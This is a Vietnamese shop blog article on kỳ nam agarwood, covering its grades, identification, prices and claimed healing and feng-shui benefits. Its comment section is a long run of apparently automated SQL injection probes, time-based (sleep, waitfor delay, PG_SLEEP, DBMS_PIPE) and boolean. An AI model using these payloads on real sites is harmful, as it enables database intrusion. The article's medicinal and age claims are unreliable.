Kỳ nam là gì? Giá, công dụng, cách nhận biết kỳ nam chuẩn

Wednesday, April 26, 2023

Kỳ Nam là loại gỗ chứa lượng lớn tinh dầu trầm hương được xem là một trong những loại gỗ quý đứng đầu nước ta thời xưa, nó được coi là món vật phẩm cống nạp, biếu tặng của giới vua chúa, quý tộc. Ngày nay, Kỳ nam không những không mất đi giá trị của một loại gỗ quý mà còn ngày càng được săn lùng với giá đắt hơn cả vàng.

Vậy Gỗ kỳ nam là gì? Có tác dụng gì mà lại đắt đến như vậy? Làm cách nào để nhận biết kỳ nam và trầm hương? Ngoài hắc kỳ nam – bạch kỳ nam còn có loại nào khác hay không? Mời các bạn cùng Trầm Mộc Hương tìm hiểu trong bài viết sau nhé!

Kỳ nam là gì?

Kỳ nam là loại gỗ chứa lượng lớn tinh dầu trầm hương hình thành trên cây dó bầu, mất rất nhiều thời gian hình thành (từ 50 năm đến hơn 1000 năm tích trầm), do đó hiếm gặp hơn Trầm rất nhiều.

Kỳ Nam gỗ quý

Kỳ nam tự nhiên có màu đen tuyền, ánh kim, vị kỳ nam rất cay, cực kỳ thơm và chữa được rất nhiều loại bệnh. Chính vì vậy mà giá trị của Kỳ nam lên đến hàng tỷ đồng và số lượng ngoài tự nhiên cực kỳ ít.

Thông thường, chất dầu trầm hương sẽ hình thành trước, trải qua thời gian, một số điểm trong khối trầm hương sẽ bị biến đổi chất dầu thành kỳ nam. Đây chính là câu trả lời cho Kỳ nam là gì.

Không phải cây dó ở vị trí địa lý nào cũng có thể cho ra kỳ, thật chất cây dó phân bố phần lớn ở nhiều nước khu vực khí hậu nhiệt đới ở châu Á. Nhưng chỉ một số rất ít quốc gia có cây dó tạo cây kỳ nam mà thôi. Việt nam là quốc gia có sản lượng kỳ lớn nhất thế giới, chất lượng kỳ nam cũng như trầm hương ở đây được xem là hàng đầu.

Rung cay dó bầu

Phân loại 4 loại gỗ kỳ nam phổ biến hiện nay

Hiện nay, Kỳ nam được chia làm 4 loại chính: Bạch kỳ nam, Thanh kỳ nam, Hoàng kỳ nam, và Hắc kỳ nam. Cách phân loại Kỳ Nam lần đầu xuất hiện trong sách “Phủ biên tạp lục” được viết bởi Lê Quý Đôn năm 1776. Sách có viết:

Họ Nguyễn trước đặt đội Am sơn, hàng năm cứ tháng hai thì đi tìm kiếm, tháng sáu thì trở về, số lượng nhiều ít không nhất định, lấy sắc sáp trắng là tốt nhất, sắc xanh đầu vịt là thứ hai, sắc sáp xanh là kém nữa, sắc sáp vàng lại càng kém nữa, sắc như vằn hổ thì kém nhất; lấy chất mềm như phấn đông, có thể cắt thành miếng là hạng tốt nhất, bền rắn là hạng xấu.”

Loại Kỳ Nam Thời gian tích trầm Đặc điểm nổi bật
Bạch Kỳ Hơn 3000 năm Màu trắng ngà hoặc xám nhạt
Thanh Kỳ Khoảng 2500 năm Màu tím ngả vàng
Hoàng Kỳ Khoảng 1500 năm
Màu vàng như màu hổ phách, chất cứng
Hắc Kỳ Hơn 1000 năm
Màu đen như hắc ín, cứng và nặng

Tục ngữ nói: “Nhất bạch, nhị thanh, tam hoàng, tứ hắc”. Có thể thấy Kỳ nam từ lâu đã được người Việt phát hiện và khai thác và phân ra thành 4 loại chính dựa theo giá trị như sau:

1. Bạch Kỳ nam

Bạch Kỳ nam có giá trị vô cùng cao rất khó định lượng, có màu trắng ngà hoặc xám nhạt.

Bạch kỳ nam rất dễ bị nhầm lẫn với những khối đá trắng hóa thạch hoặc những khối nhựa dầu màu trắng. Các loại này khi đốt lên sẽ tỏa hương nhưng không phải. Vì kỳ phải được hình thành trên cây gió bầu và có tinh dầu bên trong thì mới có giá trị thực sự. Thời gian lên men của Bạch Kỳ Nam phải mất khoảng hơn 3000 năm trở lên.

bach ky nam

2. Thanh Kỳ

Thanh Kỳ có độ quý hiếm chỉ đứng sau Bạch Kỳ Nam. Loại kỳ này có thời gian lên men không dưới 2500 năm. Thanh Kỳ có hàm lượng nhựa trầm hương rất dày đặc nên vô cùng quý hiếm. Nếu như Bạch Kỳ Nam thường dành riêng cho Hoàng đế thì Thanh Kỳ sẽ được các thành viên trong hoàng tộc sử dụng.

Thanh Kỳ có màu ánh tím xanh lam. Nguyên nhân là do chất nhựa dày và đậm đặc được truyền vào bên trong từng thớ gỗ của trầm hương. Mặt bên trong của Thanh Kỳ có sự đan xen giữa màu xanh lá cây và màu vàng (lát cắt ngang).
Loại Thanh Kỳ này sẽ tỏa ra ba tầng hương đặc biệt: làm mát, hoa anh túc và mật ong. Với sự kết hợp nồng nàn của ba loại mùi hương này, sẽ tạo ra một sự tinh tế với khứu giác. Thanh Kỳ có loại ít dầu thì chất gỗ khô và cứng, loại nhiều dầu thì chất gỗ mềm hơn..

Thanh Kỳ

3. Hoàng Kỳ

Hoàng Kỳ (huỳnh kỳ) có sắc vàng đậm pha nâu, xếp sau bạch kỳ và thanh kỳ. Thời gian lên men của Hoàng Kỳ từ 1500 năm trở lên. Hoàng Kỳ có màu vàng như màu hổ phách, chất cứng nắn và nặng. Loại kỳ này nổi tiếng vì có độ bóng như sa tanh và có nhiều đặc tính ý học khác nhau.

Thời xưa, các vị Hoàng đế Trung Quốc thường tặng Hoàng Kỳ cho các xứ thần nước khác như là món quà ngoại giao. Cách nhận biết kỳ nam này là có mùi hương nhẹ dịu, ngọt. Nếu nếm bằng miệng sẽ có cảm giác mát lạnh. Mới đầu sẽ cảm nhận được chút hương quế kèm theo nốt hương của hổ phách. Hoàng Kỳ được đánh giá là một loại kỳ với hương thơm rất quyến rũ.

Hoàng Kỳ

4. Hắc Kỳ nam

Bạn có thắc mắc hắc kỳ nam là gì không? Hắc kỳ nam là loại kỳ đen như hắc ín, cứng và nặng. Thời gian lên men của Hắc Kỳ từ 1000 năm trở lên. Thường cần đến các chuyên gia trình độ cao trong giới trầm mới có thể phân biệt được. Cần có máy X-quang cầm tay để đảm bảo chụp vào tận trong khối trầm, kiểm tra chất lỏng để không bị chích thủy ngân.

Nhằm tăng trọng lượng và nhiều cách kiểm tra khác… Hắc Kỳ Nam hiện đã vô cùng hiếm có, và tỉ lệ giả cũng cực kì nhiều. Đặc biệt khi được tiếp xúc dưới ánh sáng, bề mặt của Hắc Kỳ sẽ sáng lấp lánh như những ngôi sao trong bầu trời đêm. Hắc Kỳ là sự kết hợp giữa hương thơm của thảo mộc và thực vật. Trong y học, loại lỳ này rất được tôn sùng vì đặc tính chữa bệnh và chống viêm cực tốt

Được hình thành thực sự rất lâu, Hắc Kỳ Nam là một quá trình hòa quyện tinh túy của trời đất, từng thớ dầu đen hòa quyện đặc quánh kết thơm với sắc nâu đỏ. Kỳ ngậm vào lưỡi là cay – đốt nhẹ lên là thơm ngọt ngào.

Hac Kỳ Nam

>> Mời bạn xem thêm bài viết chi tiết về Trầm hương là gì? để hiểu rõ hơn về loại gỗ quý này!!

Sự thật về kỳ nam hóa thạch và kỳ nam nhân tạo

Trên thị trường bán trầm hương và kỳ nam hiện nay có rất nhiều tin đồn về loại kỳ nam hóa thạch và kỳ nam nhân tạo được rao bán với giá thành cũng rất cao. Vậy thực hư các loại gỗ này có thật sự tồn tại, Trầm Mộc Hương đã tổng hợp cho bạn những thông tin liên quan ở dưới đây để hiểu rõ hơn:

Kỳ nam hóa thạch 

Theo nghiên cứu của chúng tôi thì cho đến hiện tại, vẫn chưa hề có bằng chứng nào xác thực là có loại kỳ nam hóa thạch tồn tại. Chưa một ai có thể xác định được là có loại kỳ nam này, chúng xuất hiện ở đâu và có từ bao giờ. Do đó, nếu bạn được chào bán các sản phẩm kỳ nam gắn mác là “hóa thạch”, hãy thật cẩn thận với lời chào hàng đó và tìm hiểu kỹ lưỡng trước khi mua.

Kỳ nam nhân tạo

Nguồn gốc của tin đồn có thể tạo ra kỳ nam nhân tạo bắt nguồn từ việc tại Trung Quốc có một loại gỗ quý được đặt tên là Kynam mẹ (hay Qinan mẹ, Kynam Mother Tree). Người ta nói rằng, cây gỗ này có khả năng tạo ra nhựa có mùi hương giống với trầm kỳ nam của nước ta. Đã thật sự có một công trình nghiên cứu vào năm 2020 đã tiến hành nuôi ghép cây gỗ này để tạo nên kỳ nam và nhận thấy chúng có chung một số loại hợp chất hóa học với gỗ kỳ thật. Tuy nhiên, về mặt chất lượng thì kỳ nam nuôi ghép này vẫn không bao giờ có thể sánh bằng so với kỳ nam tự nhiên được phát hiện tại nước ta. Sự khác biệt ở chỗ Kỳ Nam thiên nhiên mất nhiều ngàn năm để tích trầm – điều này khiến giá trị của Kỳ Nam hơn rất nhiều lần các loại gỗ khác.

Do đó, bạn cần biết rằng, kỳ nam nuôi ghép sẽ không thể dùng để thay thế được so với kỳ nam truyền thống. Và mặc dù kỳ nam nhân tạo cũng có giá trị cao, tuy nhiên cho đến thời điểm này, không có chuyện kỳ nam trị giá hàng chục tỷ đồng có thể được sản xuất nhân tạo. 

Kỳ Nam Nhân Tạo

4 cách nhận biết kỳ nam với trầm hương đơn giản nhất 

Trầm hương và Kỳ nam có quá trình hình thành tương tự nhau, nhưng Kỳ lại đắt hơn Trầm Hương 10 – 20 lần. Đó là bởi vì Kỳ và Trầm có những điểm khác nhau mà bạn cần biết về cách nhận biết kỳ nam để tránh nhầm lẫn. Trầm Mộc Hương gợi ý 4 cách phân biệt trầm hương kỳ nam cụ thể:

Nhìn bằng mắt 

Quan sát khối kỳ dưới kính phóng đại, ta sẽ thấy những thớ thịt của kỳ sẽ xếp chồng lên nhau, các đường vân của gỗ kỳ luôn chạy thẳng, gần như song song với nhau, màu trầm khi rọi đèn mạnh vào sẽ có màu đỏ ánh kim. Các thớ thịt sẽ có lượng dầu nhiều nên nhìn sẽ có vẻ ẩm ướt.

Kỳ Nam nhìn bắng mắt thường

Nếm

Tỉa một lượng nhỏ lớp gỗ, sau đó nhai nhẹ ở răng cửa; ta sẽ thấy có độ kết dính 2 răng lại với nhau, do có chất dầu dẻo. Sau đó, dùng lưỡi nén chặt miếng kỳ đó áp sát, đầu lưỡi lưu lại đủ 5 vị (cay, đắng, mặn, ngọt, chua). Lưỡi sẽ bị tê trong thời gian dài.

Ở trầm hương chỉ có vị đắng, nhưng kỳ nam thì sẽ có vị đắng là đầu tiên, sau đó sẽ thấy ngọt, rồi đến chua và cay, cay ở đây thật chất là lúc đó lưỡi đã tê rồi nên cảm giác giống cay ở lưỡi.

Ngửi

Do có lượng đầu dẻo và tính chất bay hương của kỳ, ta sẽ thấy có mùi hương thơm ngọt the mát kiểu kẹo bạc hà. Khi đưa lại gần mắt thì cảm giác the the mắt, giống như xông hương làm mắt cảm giác cay muốn chảy nước mắt.

Đốt cháy

Khi đốt gỗ kỳ nam sẽ toả ra mùi thơm rất mạnh, khói xanh bay cao và thẳng tắp không bị ngắt đoạn. Đây là điểm đặc biệt và dễ thấy nhất mà bạn có thể áp dụng khi phân biệt kỳ nam và trầm hương.

>> Xem ngay bài viết về: Phân biệt Kỳ nam và trầm hương?

Giá kỳ nam là bao nhiêu?

Rất nhiều người dùng thắc mắc về giá kỳ nam hiện nay là bao nhiêu. Tuy nhiên, cho đến hiện tại vẫn chưa có một con số cụ thể nào về giá kỳ nam bởi tính khan hiếm của sản phẩm – có rất ít giao dịch về kỳ nam được thực hiện. Mặc dù vậy, theo khảo sát thị trường, giá kỳ nam sẽ dao động từ 100.000 USD – 800.000 USD/kg (tương đương 2 tỷ – 16 tỷ đồng). 

Đặc biệt, đối với kỳ nam tốt nhất – Bạch Kỳ Nam, mức giá của nó có thể lên đến 50 tỉ đồng/kg. Tùy vào độ hiếm có và những công dụng đặc biệt của Kỳ Nam, giá kỳ nam cũng vì thế tăng dần theo thời gian, có giá trị sưu tầm rất cao.

Tác dụng của Kỳ Nam là gì?

Không phải tự nhiên mà loại gỗ này lại có giá thành cao và được nhiều người săn lùng đến vậy. Sở dĩ, Kỳ Nam được ưa chuộng là bởi chúng mang đến rất nhiều công dụng cả về mặt sức khỏe, tâm linh và phong thủy như sau:

Lợi ích về mặt sức khoẻ

Theo Đông Y, đây là loại thảo mộc có tác dụng tiêu đờm, trị các chứng đau đầu, chóng mặt, nôn ói, tiêu chảy,…bồi bổ cơ thể, tăng cường tuổi thọ, tăng cường khí huyết, tránh gió, giữ ấm cơ thể….rất nhiều bài thuốc chữa bệnh và bồi bổ cơ thể được ghi chép trong sách đông y Trung Quốc và Nhật Bản thời xưa.

Hương thơm của Kỳ nam rất hiệu quả trong việc giảm căng thẳng mệt mỏi; giúp đầu óc thư giãn, tỉnh táo khi làm việc, dễ đi vào giấc ngủ. Bên cạnh đó Kỳ còn có thể giúp lọc sạch không khí, xua côn trùng,…, thơm lâu, dễ chịu nhất và quyến rũ nhất.

vụn kỳ nam

Tác dụng của kỳ nam về mặt tâm linh

Các sản phẩm Kỳ Nam được cho là lá bùa hộ mệnh, trừ tà khí; đem đến may mắn thịnh vượng cho người sỡ hữu bởi vì trầm hương và kỳ nam có tính Dương, là vật phẩm hữu hiệu để đẩy lùi âm khí.

Rất nhiều người trong nghề trầm đều nói là đeo trầm hương rất may mắn, ai cũng muốn giữ cho mình một mẫu nhỏ để làm vật cầu may. Chính vì vậy mà kỳ và trầm hương được ứng dụng trong phong thuỷ rất nhiều. Các sản phẩm từ trầm hương và kỳ nam giúp cho gia chủ tránh xui xẻo, tăng vượng khí, hút tài lộc và xua đuổi tà ma rất tốt.

Tuy có thể nói là “cùng một mẹ” sinh ra nhưng lý do vì sao Kỳ đắt gấp chục lần Trầm Hương ít ai biết đến. Thế nhưng, không ai phủ nhận được những công dụng và giá trị tuyệt vời mà cả Kỳ hay Trầm Hương mang lại.

Hốc cây Kỳ Nam

Tại sao kỳ nam lại đắt đỏ như vậy? Những cuộc săn tìm kỳ nam đầy mạo hiểm

Không phải tự nhiên mà kỳ nam được đánh giá cao và trở thành một trong những vật phẩm có giá trị còn hơn cả vàng. Sở dĩ có như vậy là một số lý do sau đây:

  • Qúy hiếm: Kỳ nam là một nguồn tài nguyên quý hiếm và rất khó tìm thấy. Kỳ nam chỉ được tìm thấy ở một số vùng trên thế giới. Sự khan hiếm của kỳ nam là một trong những yếu tố chính làm tăng giá trị của nó trên thị trường.
  • Tính độc đáo: Kỳ nam có màu sắc độc đáo và mùi thơm đặc trưng không loại gỗ nào sánh bằng. Điều này làm cho kỳ nam trở thành một vật liệu rất đặc biệt và được săn lùng bởi các nhà sưu tầm, nhà nghiên cứu, và các đầu mối nghệ thuật.
  • Ứng dụng rất đa dạng: Kỳ nam được sử dụng trong nhiều lĩnh vực khác nhau, bao gồm chế tạo trang sức, nghệ thuật, thủ công mỹ nghệ, nội thất, và dược phẩm. Đặc tính tự nhiên của kỳ nam, chẳng hạn như màu sắc độc đáo và tính độc đáo, làm cho nó trở thành một vật liệu có giá trị và được ưa chuộng trong các ứng dụng đa dạng.

Tuy nhiên, việc săn tìm kỳ nam cũng đầy mạo hiểm do sự khan hiếm của nó. Các nhà săn tìm kỳ nam thường phải đối mặt với những thử thách địa chất, thời tiết và công việc đòi hỏi kỹ năng, kinh nghiệm và đôi khi cả sự đánh đổi tính mạng. Các khu vực nơi kỳ nam được tìm thấy có thể có điều kiện thời tiết và địa hình khắc nghiệt, bao gồm những con đường biển nguy hiểm và môi trường nguyên sinh hoang dã. Các nhà săn tìm kỳ nam cần phải đối mặt với nguy cơ và các điều kiện khắc nghiệt khác trong quá trình săn lùng và khai thác kỳ nam.

Sản phẩm được làm từ gỗ kỳ nam

Mang giá trị cao về mặt kinh tế, phong thủy, tâm linh và lợi ích tuyệt vời cho sức khỏe, kỳ nam được ứng dụng tạo ra rất nhiều sản phẩm có ý nghĩa cao như: vòng tay, thuốc, tinh dầu chữa bệnh, mỹ nghệ (rất hiếm),…

Nguồn Thiên Mộc Hương

Leave your comment
Comments
5/27/2024 4:38 AM
Mr.

L4ImV7lP

5/27/2024 4:38 AM
Mr.

1*

5/27/2024 4:38 AM
Mr.

1*

5/27/2024 4:38 AM
Mr.

1*

5/27/2024 4:38 AM
Mr.

1*

5/27/2024 4:38 AM
Mr.

-1 OR 2+890-890-1=0+0+0+1

5/27/2024 4:38 AM
Mr.

-1 OR 3*2<(0+5+890-890)

5/27/2024 4:38 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/27/2024 4:38 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/27/2024 4:38 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/27/2024 4:38 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/27/2024 4:39 AM
Mr.

-1; waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

-1); waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

1 waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

oBIfAUW4'; waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

7f1FdmFe'); waitfor delay '0:0:15' --

5/27/2024 4:39 AM
Mr.

-5 OR 442=(SELECT 442 FROM PG_SLEEP(15))--

5/27/2024 4:39 AM
Mr.

-5) OR 487=(SELECT 487 FROM PG_SLEEP(15))--

5/27/2024 4:39 AM
Mr.

-1)) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

5/27/2024 4:40 AM
Mr.

ihIM3Xkv' OR 34=(SELECT 34 FROM PG_SLEEP(15))--

5/27/2024 4:40 AM
Mr.

8TRmTKmX')) OR 315=(SELECT 315 FROM PG_SLEEP(15))--

5/27/2024 4:40 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/27/2024 4:40 AM
Mr.

-1 OR 2+346-346-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

-1 OR 3+346-346-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

-1 OR 2+914-914-1=0+0+0+1

5/27/2024 4:40 AM
Mr.

-1 OR 3+914-914-1=0+0+0+1

5/27/2024 4:40 AM
Mr.

-1' OR 2+662-662-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

-1' OR 3+662-662-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/27/2024 4:40 AM
Mr.

1'"

5/27/2024 4:40 AM
Mr.

1����%2527%2522

5/27/2024 4:40 AM
Mr.

@@78jfP

5/27/2024 4:40 AM
Mr.

-1' OR 3+793-793-1=0+0+0+1 or 'WNXPreAk'='

5/27/2024 4:40 AM
Mr.

-1' OR 3*2<(0+5+793-793) or 'WNXPreAk'='

5/27/2024 4:40 AM
Mr.

-1' OR 3*2>(0+5+793-793) or 'WNXPreAk'='

5/27/2024 4:40 AM
Mr.

-1" OR 2+996-996-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

-1" OR 3+996-996-1=0+0+0+1 --

5/27/2024 4:40 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/27/2024 4:40 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/27/2024 4:40 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/27/2024 4:41 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/27/2024 4:41 AM
Mr.

-1; waitfor delay '0:0:15' --

5/27/2024 4:41 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/27/2024 4:41 AM
Mr.

1 waitfor delay '0:0:15' --

5/27/2024 4:41 AM
Mr.

ra9F01sP'; waitfor delay '0:0:15' --

5/27/2024 4:41 AM
Mr.

HtRyBvhL')); waitfor delay '0:0:15' --

5/27/2024 4:41 AM
Mr.

-5 OR 121=(SELECT 121 FROM PG_SLEEP(15))--

5/27/2024 4:41 AM
Mr.

-5) OR 73=(SELECT 73 FROM PG_SLEEP(15))--

5/27/2024 4:42 AM
Mr.

x6Rk36jk' OR 280=(SELECT 280 FROM PG_SLEEP(15))--

5/27/2024 4:42 AM
Mr.

DrQDDiF2') OR 475=(SELECT 475 FROM PG_SLEEP(15))--

5/27/2024 4:42 AM
Mr.

-1 OR 2+734-734-1=0+0+0+1 --

5/27/2024 4:42 AM
Mr.

-1 OR 3*2<(0+5+734-734) --

5/27/2024 4:42 AM
Mr.

-1 OR 2+393-393-1=0+0+0+1

5/27/2024 4:42 AM
Mr.

-1 OR 3+393-393-1=0+0+0+1

5/27/2024 4:42 AM
Mr.

-1' OR 2+88-88-1=0+0+0+1 --

5/27/2024 4:42 AM
Mr.

-1' OR 3+88-88-1=0+0+0+1 --

5/27/2024 4:42 AM
Mr.

-1' OR 2+215-215-1=0+0+0+1 or 'vq1bZlot'='

5/27/2024 4:42 AM
Mr.

-1' OR 3+215-215-1=0+0+0+1 or 'vq1bZlot'='

5/27/2024 4:42 AM
Mr.

-1" OR 2+164-164-1=0+0+0+1 --

5/27/2024 4:42 AM
Mr.

-1" OR 3+164-164-1=0+0+0+1 --

5/27/2024 4:42 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/27/2024 4:42 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/27/2024 4:42 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/27/2024 4:42 AM
Mr.

1'"

5/27/2024 4:42 AM
Mr.

1����%2527%2522

5/27/2024 4:42 AM
Mr.

@@XJDF8

5/27/2024 4:42 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/27/2024 4:43 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/27/2024 4:43 AM
Mr.

-1); waitfor delay '0:0:15' --

5/27/2024 4:43 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/27/2024 4:43 AM
Mr.

-1 OR 2+409-409-1=0+0+0+1 --

5/27/2024 4:43 AM
Mr.

-1 OR 3+409-409-1=0+0+0+1 --

5/27/2024 4:43 AM
Mr.

-1 OR 3+309-309-1=0+0+0+1

5/27/2024 4:43 AM
Mr.

-1' OR 2+371-371-1=0+0+0+1 --

5/27/2024 4:43 AM
Mr.

-1' OR 3*2>(0+5+371-371) --

5/27/2024 4:43 AM
Mr.

-1' OR 2+1-1+1=1 AND 371=371 --

5/27/2024 4:43 AM
Mr.

-1' OR 3*2=5 AND 371=371 --

5/27/2024 4:43 AM
Mr.

-1' OR 3+420-420-1=0+0+0+1 or 'BCwhwupd'='

5/27/2024 4:43 AM
Mr.

-1" OR 2+249-249-1=0+0+0+1 --

5/27/2024 4:43 AM
Mr.

tFdv1Zld'; waitfor delay '0:0:15' --

5/27/2024 4:43 AM
Mr.

-1" OR 3+249-249-1=0+0+0+1 --

5/27/2024 4:43 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/27/2024 4:43 AM
Mr.

lZnh0EWm')); waitfor delay '0:0:15' --

5/27/2024 4:43 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/27/2024 4:43 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/27/2024 4:44 AM
Mr.

-5) OR 667=(SELECT 667 FROM PG_SLEEP(15))--

5/27/2024 4:44 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/27/2024 4:44 AM
Mr.

-1)) OR 147=(SELECT 147 FROM PG_SLEEP(15))--

5/27/2024 4:44 AM
Mr.

-1; waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

szCNr9UO' OR 542=(SELECT 542 FROM PG_SLEEP(15))--

5/27/2024 4:44 AM
Mr.

-1); waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

H5EAjpQ7') OR 341=(SELECT 341 FROM PG_SLEEP(15))--

5/27/2024 4:44 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

2XUVwTr7')) OR 551=(SELECT 551 FROM PG_SLEEP(15))--

5/27/2024 4:44 AM
Mr.

1 waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/27/2024 4:44 AM
Mr.

uit60AKJ'; waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

1'"

5/27/2024 4:44 AM
Mr.

1����%2527%2522

5/27/2024 4:44 AM
Mr.

VmIpLDe0')); waitfor delay '0:0:15' --

5/27/2024 4:44 AM
Mr.

-5 OR 11=(SELECT 11 FROM PG_SLEEP(15))--

5/27/2024 4:45 AM
Mr.

-1)) OR 857=(SELECT 857 FROM PG_SLEEP(15))--

5/27/2024 4:45 AM
Mr.

ftLbwGkU' OR 408=(SELECT 408 FROM PG_SLEEP(15))--

5/27/2024 4:45 AM
Mr.

BFNmYYAq') OR 964=(SELECT 964 FROM PG_SLEEP(15))--

5/27/2024 4:45 AM
Mr.

YxK5rZBI')) OR 502=(SELECT 502 FROM PG_SLEEP(15))--

5/27/2024 4:45 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/27/2024 4:45 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/27/2024 4:45 AM
Mr.

1'"

5/27/2024 4:45 AM
Mr.

1����%2527%2522

5/27/2024 4:45 AM
Mr.

@@VpmLF

5/30/2024 9:42 AM
Mr.

PvOolZSC

5/30/2024 9:42 AM
Mr.

1*

5/30/2024 9:42 AM
Mr.

1*

5/30/2024 9:42 AM
Mr.

1*

5/30/2024 9:42 AM
Mr.

1*

5/30/2024 9:42 AM
Mr.

-1 OR 2+634-634-1=0+0+0+1

5/30/2024 9:42 AM
Mr.

-1 OR 3+634-634-1=0+0+0+1

5/30/2024 9:42 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/30/2024 9:42 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/30/2024 9:43 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/30/2024 9:43 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/30/2024 9:43 AM
Mr.

-1; waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

-1); waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

1 waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

kOlJlEHm'; waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

uGMRlYAO'); waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

Zq3sAXwF')); waitfor delay '0:0:15' --

5/30/2024 9:43 AM
Mr.

-5 OR 852=(SELECT 852 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

-5) OR 688=(SELECT 688 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

-1)) OR 594=(SELECT 594 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

H9DPzEjP' OR 94=(SELECT 94 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

Cj01ais6') OR 433=(SELECT 433 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

Rn0F1rm8')) OR 106=(SELECT 106 FROM PG_SLEEP(15))--

5/30/2024 9:43 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/30/2024 9:43 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/30/2024 9:43 AM
Mr.

1'"

5/30/2024 9:43 AM
Mr.

1����%2527%2522

5/30/2024 9:44 AM
Mr.

@@R9fcg

5/30/2024 9:48 AM
Mr.

p7Vlh6l2

5/30/2024 9:48 AM
Mr.

1*

5/30/2024 9:48 AM
Mr.

1*

5/30/2024 9:48 AM
Mr.

1*

5/30/2024 9:48 AM
Mr.

1*

5/30/2024 9:48 AM
Mr.

-1 OR 2+121-121-1=0+0+0+1

5/30/2024 9:48 AM
Mr.

-1 OR 3+121-121-1=0+0+0+1

5/30/2024 9:48 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/30/2024 9:48 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/30/2024 9:48 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/30/2024 9:48 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/30/2024 9:48 AM
Mr.

-1; waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

-1); waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

1 waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

2Tmh7v8d'; waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

09InPAG5'); waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

ikDfoRRI')); waitfor delay '0:0:15' --

5/30/2024 9:48 AM
Mr.

-5 OR 216=(SELECT 216 FROM PG_SLEEP(15))--

